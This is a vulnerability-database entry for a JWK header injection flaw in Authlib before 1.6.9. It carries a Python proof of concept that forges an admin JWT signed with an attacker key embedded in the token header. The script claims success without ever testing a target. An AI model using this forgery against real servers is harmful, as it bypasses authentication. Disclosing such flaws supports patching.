CVE-2026-27962

Description

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:* - VULNERABLE

Authlib < 1.6.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-27962 PoC - Authlib JWK Header Injection
This PoC demonstrates how an attacker can forge arbitrary JWT tokens
that pass signature verification in vulnerable versions of Authlib.
"""

import json
import base64
from jwcrypto import jwk
from authlib.jose import jwt

# Generate attacker key pair
key = jwk.JWK.generate(kty='RSA', size=2048)
private_key = key.export_to_pem(private_key=True)
public_key_jwk = json.loads(key.export_public())

# Create malicious payload (attacker wants admin access)
payload = {
    'sub': 'attacker',
    'admin': True,
    'iat': 1700000000,
    'exp': 1700100000
}

# Forge JWT with embedded public key in header
# This is the key exploitation technique
header = {
    'alg': 'RS256',
    'typ': 'JWT',
    'jwk': public_key_jwk  # Embed attacker's public key
}

# Sign with attacker's private key
# In vulnerable version, when key=None is passed to decode,
# the server will use the embedded jwk for verification
forged_token = jwt.encode(header, payload, private_key)

print(f"[+] Forged JWT Token: {forged_token}")
print(f"[+] Payload contains admin=True, signed with attacker's key")
print(f"[+] Target server will accept this token if it passes key=None")
print(f"\n[+] Exploit successful - Authentication bypass achieved")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27962
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27962
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27962/
[4] VulDB https://vuldb.com/cve/CVE-2026-27962
[5] https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681
[6] https://github.com/authlib/authlib/releases/tag/v1.6.9
[7] https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27962", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:07.383", "lastModified": "2026-03-17T20:46:48.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9."}, {"lang": "es", "value": "Authlib es una biblioteca de Python que construye servidores OAuth y OpenID Connect. Antes de la versión 1.6.9, una vulnerabilidad de inyección de encabezado JWK en la implementación JWS de authlib permite a un atacante no autenticado falsificar tokens JWT arbitrarios que pasan la verificación de firma. Cuando se pasa key=None a cualquier función de deserialización JWS, la biblioteca extrae y utiliza la clave criptográfica incrustada en el campo de encabezado jwk del JWT controlado por el atacante. Un atacante puede firmar un token con su propia clave privada, incrustar la clave pública correspondiente en el encabezado y hacer que el servidor acepte el token falsificado como criptográficamente válido — eludiendo la autenticación y la autorización por completo. Este problema ha sido parcheado en la versión 1.6.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.9", "matchCriteriaId": "8C677FEC-2094-49D8-ABAB-F740B6F83D38"}]}]}], "references": [{"url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}